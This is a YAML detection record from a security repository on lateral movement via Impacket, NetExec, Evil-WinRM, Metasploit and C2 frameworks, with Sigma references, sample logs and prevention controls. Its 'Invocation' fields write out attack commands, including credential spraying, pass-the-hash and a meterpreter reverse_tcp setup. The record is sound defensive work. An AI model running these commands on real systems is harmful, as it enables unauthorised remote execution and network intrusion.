Files
imposterandClaude Opus 4.8 95bf405759 feat(ci): chokepoint schema validator + link audit, fix bad data
Adds scripts/validate_schema.py and a validate-data.yml PR gate that
checks every chokepoints/*/*.yml against schema/chokepoint-schema.yml:
required fields, enum values, UUIDv4/ISO-date/MITRE-id formats, tactic
folder consistency, and that referenced Sigma paths exist on disk.
(Replaces the validate_schema.py that cp-drafter referenced but was
never created.) Validator tolerates the authored conventions for
Variations.Status and ExpectedFPRate (leading token + detail).

Fixes surfaced by the validator/link audit:
- 2 invalid Ids regenerated as real UUIDv4 (ransomware-service-
  manipulation, remote-execution-tools)
- 4 dead reference citations repaired (Proofpoint moved URL; Trustwave
  via Wayback; Metasploit psexec -> GitHub docs; BleepingComputer had a
  wrong slug -> correct article)

Adds scripts/check_links.py — advisory external-link sweep (not a CI
gate; external links flake). Buckets BROKEN vs BLOCKED vs OK so API
endpoints and bot-blocked blogs are not mistaken for rot.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
2026-06-13 10:09:20 -06:00

479 lines
25 KiB
YAML

Name: Remote Execution Tools (HackTools)
Id: 36c84325-2c23-4511-8d69-23b94256f846
MitreIds:
- T1021.002
- T1021.003
- T1021.006
- T1047
- T1053.005
- T1569.002
Tactics:
- Lateral Movement
- Execution
Techniques:
- 'Remote Services: SMB/Windows Admin Shares'
- 'Remote Services: Distributed Component Object Model'
- 'Remote Services: Windows Remote Management'
- Windows Management Instrumentation
- 'Scheduled Task/Job: Scheduled Task'
- 'System Services: Service Execution'
DetectionPriority: HIGH
ThreatPrevalence: HIGH
DetectionDifficulty: MEDIUM
Description: 'Offensive security tools (Impacket, NetExec, CrackMapExec, Evil-WinRM) used for remote code execution across
Windows environments. These frameworks wrap legitimate Windows protocols (SMB, WMI, WinRM, RPC) to execute code on remote
systems using valid admin credentials. Despite tool diversity, the chokepoint is invariant: valid admin credentials, network
access to target ports, and a remote execution primitive (service creation, WMI process, scheduled task) are always required.
'
LastUpdated: '2026-03-07'
Author: '@iimp0ster'
Variations:
- Name: Impacket
FirstSeen: '2015'
Status: Active
SourceURL: https://github.com/fortra/impacket
NotesShort: Python suite with psexec/wmiexec/atexec/dcomexec modules; rdp_shadow added January 2025
Notes: 'Python suite with multiple execution modules: psexec.py (SMB service creation), smbexec.py (SMB + scheduled tasks),
wmiexec.py (WMI process creation), atexec.py (Task Scheduler), dcomexec.py (DCOM), rdp_shadow.py (RDP session hijacking,
added 2025-01)
'
VariantId: impacket
Command:
Invocation: "python3 psexec.py domain/admin:Password123@192.168.1.10\npython3 wmiexec.py domain/admin:Password123@192.168.1.10\npython3 psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee domain/admin@192.168.1.10"
Context: 'Python suite with psexec (SMB service), wmiexec (WMI), smbexec (temp service), atexec (Task Scheduler). psexec creates a service on the remote host via IPC$/svcctl.'
Artifacts:
- 'Security EID 4624: Network logon (Type 3) with admin account'
- 'Security EID 4672: Special privileges assigned'
- 'System EID 7045: Service installed (random name)'
- 'Security EID 5145: IPC$ and ADMIN$ share access'
- 'Sysmon EID 1: services.exe or wmiprvse.exe → cmd.exe'
ChokepointMapping: 'SMB auth (4624 Type 3) → IPC$/svcctl → service created (7045) → services.exe spawns cmd.exe'
- Name: CrackMapExec
FirstSeen: '2016'
Status: Legacy
SourceURL: https://github.com/byt3bl33d3r/CrackMapExec
NotesShort: Archived December 2023; superseded by NetExec. CME-specific signatures now stale
Notes: Multi-protocol framework covering SMB, WMI, WinRM, MSSQL; original repository archived by maintainer on December
6, 2023 (read-only); superseded by NetExec. Defenders should not expect CME-specific signatures to receive community
updates
VariantId: crackmapexec
Command:
Invocation: "cme smb 192.168.1.0/24 -u admin -p Password123 --exec-method smbexec -x \"whoami\"\ncme smb 192.168.1.0/24 -u admin -H <hash> --exec-method wmiexec -x \"whoami\"\ncme winrm 192.168.1.10 -u admin -p Password123 -x \"whoami\""
Context: 'Multi-protocol framework (archived Dec 2023, superseded by NetExec). Binary was crackmapexec or cme.'
Artifacts:
- 'Security EID 4624: Multiple Type 3 logons from same source IP in short window'
- 'Security EID 4625: Failed logons (credential spraying)'
- 'Sysmon EID 1: services.exe or wmiprvse.exe → cmd.exe across multiple hosts'
- 'Sysmon EID 3: Single source IP → multiple internal destinations on 445/135/5985'
ChokepointMapping: 'Credential spray (4624/4625 from single IP) → exec method per host → lateral spread pattern'
- Name: NetExec
FirstSeen: '2023'
Status: Active
SourceURL: https://github.com/Pennyw0rth/NetExec
NotesShort: Active CrackMapExec fork; adds LDAP, SSH, and improved OPSEC features
Notes: Active CrackMapExec fork; adds LDAP, SSH, improved OPSEC features
VariantId: netexec
Command:
Invocation: "nxc smb 192.168.1.0/24 -u admin -p Password123 --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.0/24 -u admin -H <hash> --exec-method wmiexec -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p Password123 -x \"whoami\""
Context: 'Multi-protocol framework. Spray credentials across subnets. Supports SMB, WMI, WinRM, LDAP, SSH. Active fork of archived CrackMapExec.'
Artifacts:
- 'Security EID 4624: Multiple Type 3 logons from same source IP in short window'
- 'Security EID 4625: Failed logons (credential spraying)'
- 'Sysmon EID 1: services.exe or wmiprvse.exe → cmd.exe across multiple hosts'
- 'Sysmon EID 3: Single source IP → multiple internal destinations on 445/135/5985'
ChokepointMapping: 'Credential spray (4624/4625 from single IP) → exec method per host → lateral spread pattern'
- Name: Evil-WinRM
FirstSeen: '2019'
Status: Active
SourceURL: https://github.com/Hackplayers/evil-winrm
NotesShort: Dedicated WinRM exploitation tool targeting port 5985/5986
Notes: Dedicated WinRM exploitation tool; targets port 5985/5986
VariantId: evil-winrm
Command:
Invocation: "evil-winrm -i 192.168.1.10 -u admin -p Password123\nevil-winrm -i 192.168.1.10 -u admin -H aad3b435b51404eeaad3b435b51404ee"
Context: 'Dedicated WinRM exploitation tool. Uses port 5985/5986. Provides PowerShell session on target. Supports pass-the-hash.'
Artifacts:
- 'Security EID 4624: Network logon (Type 3) on port 5985/5986'
- 'Sysmon EID 1: wsmprovhost.exe → powershell.exe'
- 'Windows-WinRM/Operational: Session created'
- 'Sysmon EID 3: Inbound connection on 5985/5986'
ChokepointMapping: 'WinRM auth (5985) → wsmprovhost.exe spawns powershell.exe → command execution'
- Name: Metasploit psexec
FirstSeen: '2007'
Status: Active
SourceURL: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md
NotesShort: Original PsExec-style SMB execution via Metasploit framework
Notes: Original PsExec-style SMB execution via Metasploit framework
VariantId: metasploit-psexec
Command:
Invocation: "use exploit/windows/smb/psexec\nset RHOSTS 192.168.1.10\nset SMBUser admin\nset SMBPass Password123\nset PAYLOAD windows/meterpreter/reverse_tcp\nexploit"
Context: 'Original psexec in Metasploit. Creates service, uploads payload via ADMIN$ share, executes via service start.'
Artifacts:
- 'Security EID 4624: Network logon (Type 3)'
- 'System EID 7045: Service installed with random name'
- 'Security EID 5145: ADMIN$ share access'
- 'Sysmon EID 1: services.exe → rundll32.exe or payload'
- 'Sysmon EID 11: Payload written to ADMIN$ share'
ChokepointMapping: 'SMB auth → ADMIN$ share write → service created (random name) → Meterpreter callback'
- Name: Sliver
FirstSeen: '2020'
Status: Active
SourceURL: https://github.com/BishopFox/sliver
NotesShort: Open-source C2 widely adopted by nation-state and ransomware actors as Cobalt Strike alternative
Notes: Open-source C2 framework widely adopted by nation-state and ransomware actors as a Cobalt Strike alternative; built-in
lateral movement over SMB/WMI using the same execution primitives this chokepoint detects; used by threat actors following
Fortra's crackdown on pirated Cobalt Strike licenses
VariantId: sliver
Command:
Invocation: "sliver > psexec -t <target> -s <service_name> -p <profile>\n# Or via WMI:\nsliver > execute-assembly -t <target> -- wmiexec\n# Implant types: session (interactive), beacon (async)\n# Transports: named pipes, mTLS, WireGuard, HTTPS, DNS"
Context: 'Open-source C2 by BishopFox. Growing adoption as CobaltStrike alternative. Implants are cross-compiled Go binaries.'
Artifacts:
- 'Security EID 4624: Network logon (Type 3)'
- 'System EID 7045: Service installed (Sliver psexec)'
- 'Sysmon EID 1: services.exe → Sliver implant binary'
- 'Sysmon EID 3: mTLS/WireGuard/HTTPS to C2'
ChokepointMapping: 'Auth via SMB/WMI → service or process created on target → Sliver implant callback to C2'
- Name: Havoc
FirstSeen: '2022'
Status: Active
SourceURL: https://github.com/HavocFramework/Havoc
NotesShort: Modern C2 with strong EDR bypass features; uses same underlying Windows execution primitives
Notes: Modern open-source C2 framework with strong EDR bypass features and lateral movement capabilities; described as 'entry-level
C2 for serious criminals'; increasingly observed in intrusions alongside or replacing Impacket; uses the same underlying
Windows execution primitives (service creation, WMI, WinRM)
VariantId: havoc
Command:
Invocation: "havoc > jump psexec <target>\nhavoc > jump winrm <target>\nhavoc > jump wmi <target>\n# Demon agent: position-independent shellcode\n# Supports sleep obfuscation, indirect syscalls, token manipulation"
Context: 'Open-source C2 with Demon agent. Supports PSExec, WinRM, WMI lateral movement. Agents use indirect syscalls and sleep obfuscation.'
Artifacts:
- 'Security EID 4624: Network logon (Type 3)'
- 'System EID 7045: Service installed (if psexec jump)'
- 'Sysmon EID 1: services.exe or wmiprvse.exe → Demon loader'
- 'Sysmon EID 3: HTTPS callback to Havoc teamserver'
ChokepointMapping: 'Auth via SMB/WMI/WinRM → service/process on target → Demon agent callback to teamserver'
Prerequisites:
- Network access to target on at least one required protocol port (SMB 445, WMI/RPC 135, WinRM 5985/5986)
- Remote execution surface enabled on target (Server service for SMB, WinRM service, WMI, or Task Scheduler)
Chokepoints:
- Stage: Network Authentication
Input: Attacker has valid admin credentials (password, hash, or ticket)
Invariant: Valid admin credentials (local or domain) must be obtained before any remote execution attempt
Observable: 'Windows Security EID 4624 (Logon Type 3, Network) with admin account. EID 4672 (Special Privilege
Logon). Source IP is typically not a known admin workstation.'
WhyCantBypass: All remote execution tools require authenticated access. No valid credentials means authentication failure
at every attempted protocol regardless of which tool is used
LogSources:
- Windows Security Event ID 4624 (Network Logon)
- Windows Security Event ID 4672 (Special Privilege Logon)
- Windows Security Event ID 4648 (Logon with Explicit Credentials)
- Windows Security Event ID 4769 (Kerberos Service Ticket Request)
DetectionTier: Research
SigmaRef: ''
- Stage: Remote Process/Service Creation
Input: Authenticated admin session established on target
Invariant: 'Tool invokes a Windows execution primitive on the remote host: service creation (SMB), WMI process spawn, scheduled
task creation, or WinRM command'
Observable: 'Sysmon EID 1 showing services.exe or wmiprvse.exe spawning cmd.exe/powershell.exe. Windows Security
EID 7045 (Service Installed) for psexec-style tools. EID 4688 with cross-logon session correlation.'
WhyCantBypass: A command must run on the target via one of these four primitives. No other execution surface exists over
these authenticated protocols. Tools must first establish an authenticated session over a protocol port (445, 135, 5985/5986).
No reachable port means no remote execution regardless of credential validity
LogSources:
- Windows Security Event ID 4697 / System 7045 (Service Installed)
- Windows Security Event ID 5145 (IPC$/svcctl share access)
- Sysmon Event ID 1 (wmiprvse.exe or services.exe spawning cmd.exe/powershell.exe)
DetectionTier: Analyst
SigmaRef: sigma-rules/remote-execution/analyst.yml
BypassNote: LOTL tools (winrs.exe, wmic /node:, Enter-PSSession, Invoke-Command) produce identical telemetry to Impacket
but with signed Microsoft binaries. Detection must be purely behavioral with no reliance on tool signatures
- Stage: Lateral Spread
Input: Remote command interpreter is running on one or more targets
Invariant: The same credential and execution primitive sequence repeats across multiple hosts in a short window or follows
a deliberate pivot path
Observable: 'Windows Security EID 4624 showing the same account authenticating to multiple hosts within minutes.
Sysmon EID 3 showing same source IP connecting to multiple RFC1918 destinations on SMB/WinRM ports.'
WhyCantBypass: Lateral movement by definition requires replication of the credential-plus-primitive pattern on each subsequent
host. The telemetry is identical on every hop
LogSources:
- Windows Security Event ID 4624 (multiple target hosts, short window)
- Sysmon Event ID 3 (same source IP, multiple RFC1918 destinations)
DetectionTier: Hunt
SigmaRef: sigma-rules/remote-execution/hunt.yml
EvolutionTimeline:
- Date: 2016-Q1
Event: CrackMapExec released as multi-protocol framework
Change: Multi-protocol framework combining SMB, WMI, and WinRM in one tool; detection must cover all protocols.
DetectionImpact: Detection must cover multiple protocols, not just SMB
Variants: []
EventType: event
- Date: 2019-Q2
Event: Evil-WinRM released as dedicated WinRM exploitation tool
Change: Dedicated WinRM exploitation tool released; WinRM authentication spike detection becomes important.
DetectionImpact: WinRM authentication spike detection becomes important
Variants: []
EventType: event
- Date: 2023-Q3
Event: NetExec forked from CrackMapExec
Change: Active CrackMapExec fork adds LDAP and SSH support; no fundamental change to underlying Windows API behavior.
DetectionImpact: No fundamental change to underlying Windows API behaviors
Variants: []
EventType: event
- Date: 2023-Q4
Event: CrackMapExec officially archived
Change: CME archived December 6, 2023; behavioral detection remains valid but CME-specific hash/signature rules stop receiving
updates.
DetectionImpact: Behavioral detection remains valid; tool-specific hash/signature-based detection for CME becomes stale
Variants: []
EventType: event
- Date: 2025-01
Event: Impacket adds rdp_shadow.py (PR#2064)
Change: Native RDP session hijacking (rdp_shadow.py) added to Impacket suite via PR#2064.
DetectionImpact: Existing RDP session manipulation detection (Event ID 4624 LogonType 10) applies
Variants: []
EventType: event
Detections:
- Level: Research
Description: Identify network logon events followed by service creation or remote process execution
LogSources:
- Windows Security Event ID 4624 (Successful Logon)
- Windows Security Event ID 4688 (Process Creation)
- Windows System Event ID 7045 (Service Installed)
Logic: 'Network logon (4624 LogonType 3) by a local Administrators or Domain Admins member, followed within 60 seconds by a service creation (7045) or process creation with an elevated token.'
ExpectedFPRate: High
UseCase: Baseline normal admin activity; understand legitimate remote administration patterns
SigmaRule: sigma-rules/remote-execution/research.yml
- Level: Hunt
Description: Network logon with suspicious service creation (random name or unusual path) or WMI parent process
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4624 (Logon)
- Windows Security Event ID 4697 (Service Installed)
- Windows System Event ID 7045 (Service Installed)
Logic: 'Network logon (4624 LogonType 3) AND one of: service created with a random 8-10 char alphanumeric name or binary path in \Windows\Temp\, \Users\Public\, or \ProgramData\; OR process created with parent wmiprvse.exe or services.exe spawning cmd.exe or powershell.exe from unusual paths.'
ExpectedFPRate: Medium
UseCase: Active hunt for lateral movement campaigns; identifies PsExec-style and WMI execution
SigmaRule: sigma-rules/remote-execution/hunt.yml
- Level: Analyst
Description: Network logon + IPC$ access + suspicious service or multiple hosts in spray pattern
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Sysmon Event ID 3 (Network Connection)
- Windows Security Event ID 4624 (Logon)
- Windows Security Event ID 4697/7045 (Service)
- Windows Security Event ID 5145 (Detailed File Share)
Logic: 'Network logon (4624 LogonType 3) AND IPC$ share access (5145 ShareName=IPC$) AND service creation with a random 8-10 char name or binary in \Windows\Temp\ or \Users\Public\ or command cmd.exe/powershell.exe. Also fires on spray pattern: same source IP hitting 3+ hosts within 10 minutes, RFC1918 to RFC1918.'
ExpectedFPRate: Low
UseCase: SOC alerting for active lateral movement; direct IR escalation trigger
SigmaRule: sigma-rules/remote-execution/analyst.yml
Intel:
- Name: MITRE ATT&CK - Impacket Software S0357
Tier: primary
URL: https://attack.mitre.org/software/S0357/
Description: Lists every known threat actor (APT groups, ransomware operators) documented using Impacket; far more useful
to a defender than the raw GitHub repo for understanding real-world prevalence
- Name: MITRE ATT&CK - T1021.003 DCOM
Tier: primary
URL: https://attack.mitre.org/techniques/T1021/003/
Description: Technique definition for DCOM-based lateral movement; covers dcomexec.py usage and detection guidance
- Name: MITRE ATT&CK - T1569.002 Service Execution
Tier: primary
URL: https://attack.mitre.org/techniques/T1569/002/
Description: Technique definition for service-based remote execution (psexec/smbexec pattern); the primary detection signal
in this chokepoint's hunt and analyst rules
- Name: Microsoft - Storm-0501 Ransomware Hybrid Cloud Attacks
Tier: primary
URL: https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/
Description: Documents Storm-0501 using Impacket SecretsDump for lateral movement in hybrid cloud environments; concrete
example of Impacket use in a 2024 ransomware campaign
LinkedFrom:
- Impacket
- Name: Impacket GitHub
Tier: primary
URL: https://github.com/fortra/impacket
Description: Monitor releases and PRs for new execution modules; source of truth for what capabilities the suite currently
covers
- Name: NetExec GitHub
Tier: primary
URL: https://github.com/Pennyw0rth/NetExec
Description: Active successor to CrackMapExec; track new protocol support and OPSEC improvements that affect detection
- Name: SOC Investigation - Event ID 5145 Threat Hunting
Tier: primary
URL: https://www.socinvestigation.com/threat-hunting-with-eventid-5145-object-access-detailed-file-share/
Description: Detailed guidance on using Event ID 5145 (Detailed File Share) for lateral movement detection; covers IPC$
access correlation
LinkedFrom:
- Remote Execution Primitive
RelatedChokepoints:
- ransomware-service-manipulation
OsintSources:
- Platform: Shodan
Query: port:5985 product:"Microsoft HTTPAPI"
URL: https://www.shodan.io/search?query=port%3A5985+product%3A%22Microsoft+HTTPAPI%22
Notes: Finds internet-exposed WinRM endpoints; narrow with 'org:' or 'net:' filters to audit your own attack surface. Run
a second query on port 5986 for the HTTPS variant.
- Platform: Shodan
Query: ssl.jarm:07d14d16d21d21d00042d41d00041de5fb3038104f457d92ba37e62256d5 port:443
URL: https://www.shodan.io/search?query=ssl.jarm%3A07d14d16d21d21d00042d41d00041de5fb3038104f457d92ba37e62256d5
Notes: Clusters of hosts sharing this default Cobalt Strike JARM fingerprint are likely team servers; more resilient to
infrastructure rotation than IP/domain blocklists.
- Platform: GitHub Code Search
Query: '"wmiexec" OR "smbexec" OR "atexec" path:*.py'
URL: https://github.com/search?q=%22wmiexec%22+OR+%22smbexec%22+OR+%22atexec%22+path%3A*.py&type=code
Notes: Finds community tools built on Impacket execution primitives; use for defender awareness of new modules extending
the execution surface.
KnownBypasses:
- Bypass: Using legitimate service names that blend in with existing services
Mitigation: Maintain a baseline of approved services; alert on any new service creation.
- Bypass: NTLM relay attacks instead of direct credential use
Mitigation: Enable SMB signing and LDAP signing; disable NTLM where operationally feasible.
- Bypass: Using legitimate admin tools (psexec.exe from Sysinternals)
Mitigation: Enforce software allowlisting and monitor hash for known-good vs. impersonated versions.
- Bypass: Living Off the Land using built-in Windows admin tools (winrs.exe, wmic /node:, Enter-PSSession)
Mitigation: Restrict WinRM and WMI access via Windows Firewall; require PAW for remote administration.
- Bypass: Kerberos-based lateral movement (Overpass-the-Hash, Pass-the-Ticket, Silver/Golden Tickets)
Mitigation: Enable AES encryption for Kerberos; protect the krbtgt account; monitor for anomalous TGS requests.
YaraRules:
- yara-rules/impacket-indicators.yar
RawLogs:
- Type: Windows Event Log
EventId: 4624
Source: Microsoft-Windows-Security-Auditing
Description: Network logon (Type 3) from attacker IP before remote execution
MatchedRules:
- Research
- Analyst
Sample: 'EventID: 4624 (An account was successfully logged on)
TimeCreated: 2024-07-09T01:33:47.2284110Z
Channel: Security
LogonType: 3
NewLogonUserName: Administrator
NewLogonDomain: CORP
AuthenticationPackageName: NTLM
LogonProcessName: NtLmSsp
IpAddress: 10.10.50.5
IpPort: 49221
# LogonType=3 (Network) from internal IP. Pre-execution authentication.
'
- Type: Windows Event Log
EventId: 5145
Source: Microsoft-Windows-Security-Auditing
Description: IPC$ share access. PsExec/Impacket opens IPC$/svcctl before service creation
MatchedRules:
- Analyst
Sample: 'EventID: 5145 (A network share object was checked for access)
TimeCreated: 2024-07-09T01:33:47.4418230Z
Channel: Security
SubjectUserName: Administrator
ShareName: \\*\IPC$
RelativeTargetName: svcctl
AccessList: %%4416 (ReadData)
IpAddress: 10.10.50.5
# IPC$/svcctl access = opening service control manager over SMB (PsExec/Impacket pattern)
'
- Type: Windows Event Log
EventId: 7045
Source: Service Control Manager
Description: Random-named service installed from TEMP path. Classic PsExec/Impacket signature
MatchedRules:
- Research
- Hunt
- Analyst
Sample: 'EventID: 7045 (A new service was installed in the system)
TimeCreated: 2024-07-09T01:33:47.8834120Z
Channel: System
ServiceName: xvkbmrfe
ServiceFileName: C:\Windows\Temp\xvkbmrfe.exe
ServiceType: user mode service
ServiceStartType: demand start
ServiceAccount: LocalSystem
# 8-char random name + TEMP binary path = PsExec/Impacket/CrackMapExec pattern
'
- Type: Sysmon
EventId: 1
Source: Microsoft-Windows-Sysmon/Operational
Description: cmd.exe spawned from services.exe. Service binary executing attacker commands
MatchedRules:
- Hunt
- Analyst
Sample: 'EventID: 1 (Process Create)
UtcTime: 2024-07-09 01:33:48.227
ProcessId: 4096
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd.exe /Q /c whoami 1>\\127.0.0.1\ADMIN$\__1720488827.18 2>&1
ParentProcessId: 612
ParentImage: C:\Windows\System32\services.exe
# services.exe → cmd.exe is the canonical PsExec parent chain
# Output redirected to ADMIN$ share. PsExec output capture pattern.
'
EmulationScript:
File: emulation/remote-execution-tools/emulate.ps1
Language: powershell
Description: Simulates network logon, IPC$ access, random-named service creation, and cmd.exe execution
SafetyNotes: Requires Administrator. All activity targets localhost only. Run in isolated lab VM.
AtomicRef: T1021.002
TheConstant: Valid admin credentials → authenticated protocol (SMB/WMI/WinRM) → remote command execution
PreventionSummary: >
Valid credentials alone are not sufficient if the offensive tools that use them are blocked.
Restricting dual-use admin utilities (PsExec, Impacket, NetExec) from executing on endpoints
prevents lateral movement even when an attacker has valid admin credentials.
PreventionOpportunities:
- Category: Endpoint · Application Control
Control: Block dual-use offensive tools from executing on workstations and servers
Impact: Prevents lateral movement even when the attacker holds valid admin credentials - the
tools themselves become the chokepoint that is blocked.
MagicSwordFit: MagicSword's LOLBAS / dual-use controls block offensive admin tools
(Impacket, NetExec, PsExec, CrackMapExec) by default, with policy tuned to allow only
what your teams legitimately need.
MagicSwordTag: lolbas
- Category: Identity
Control: Enforce tiered admin accounts with MFA and eliminate standing admin access
Impact: Valid credentials are harder to obtain and reuse across the network; removes the
"credentials = immediate access" assumption.
- Category: Network
Control: Segment workstation-to-workstation SMB (445/TCP) and WMI (135/TCP) traffic
Impact: Blocks the lateral movement protocols at the network layer even if tools execute,
limiting the blast radius of any single compromised host.